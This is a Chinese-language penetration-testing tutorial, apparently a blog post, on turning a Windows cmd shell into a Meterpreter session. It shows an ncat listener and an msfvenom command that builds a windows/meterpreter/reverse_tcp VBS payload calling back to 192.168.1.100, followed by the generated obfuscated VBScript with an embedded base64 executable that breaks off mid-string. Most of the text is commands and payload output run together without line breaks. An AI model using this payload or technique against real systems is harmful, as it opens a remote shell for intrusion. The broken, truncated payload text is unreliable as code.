在 cmd shell 中执行 metasploit vbs payload
在 cmd shell 中执行 metasploit vbs payload
如果你是一个渗透测试者/研究人员,你可能希望有时从 cmd shell 获得一个 meterpreter 会话,例如:(sqlmap --os-shell 或其他工具)。前任:
$ ncat -l -p 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\test\Desktop>ver
ver Microsoft Windows XP [Version 5.1.2600]
C:\Documents and Settings\test\Desktop>
在前面,您需要尝试以下方法:
- A. 将 exe 转换为批处理脚本。
- b. 从远程服务器下载负载文件(FTP、TFTP、HTTP 等)。
- c. …
现在,我将向你展示如何在 cmd.exe中运行 metasploit payload。请尝试思考以下问题:
- 如何使用 msfvenom 生成有效负载?
- 如何以简单/兼容的方式运行 payload ?
如何使用 msfvenom 生成有效负载?
为了在 Windows XP/2003 上测试有效负载,我们选择 vbs 格式 .如果您需要帮助,请尝试 [msfvenom -h]
$ msfvenom -p windows/meterpreter/reverse_tcpLHOST=192.168.1.100 LPORT=4444 -f vbs --arch x86 --platform winNo encoder or badchars specified, outputting raw payloadPayload size: 333 bytesFinal size of vbs file: 7370 bytesFunction oSpLpsWeU(XwXDDtdR)urGQiYVn = "" & _ XwXDDtdR & "" Set gFMdOBBiLZ = CreateObject("MSXML2.DOMDocument.3.0")gFMdOBBiLZ.LoadXML(urGQiYVn)oSpLpsWeU = gFMdOBBiLZ.selectsinglenode("B64DECODE").nodeTypedValueset gFMdOBBiLZ = nothingEnd FunctionFunction skbfzWOqR()cTENSbYbnWY = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAMC7z0MAAAAAAAAAAOAADwMLAQI4AAIAAAAOAAAAAAAAABAAAAAQAAAAIAAAAABAAAAQAAAAAgAABAAAAAEAAAAEAAAAAAAAAABAAAAAAgAARjoAAAIAAAAAACAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAAAwAABkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC50ZXh0AAAAKAAAAAAQAAAAAgAAAAIAAAAAAAAAAAAAAAAAACAAMGAuZGF0YQAAAJAKAAAAIAAAAAwAAAAEAAAAAAAAAAAAAAAAAAAgADDgLmlkYXRhAABkAAAAADAAAAACAAAAEAAAAAAAAAAAAAAAAAAAQAAwwAAAAAAAAAAAAAAAAAAAAAC4ACBAAP/gkP8lODBAAJCQAAAAAAAAAAD/AAAAAP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA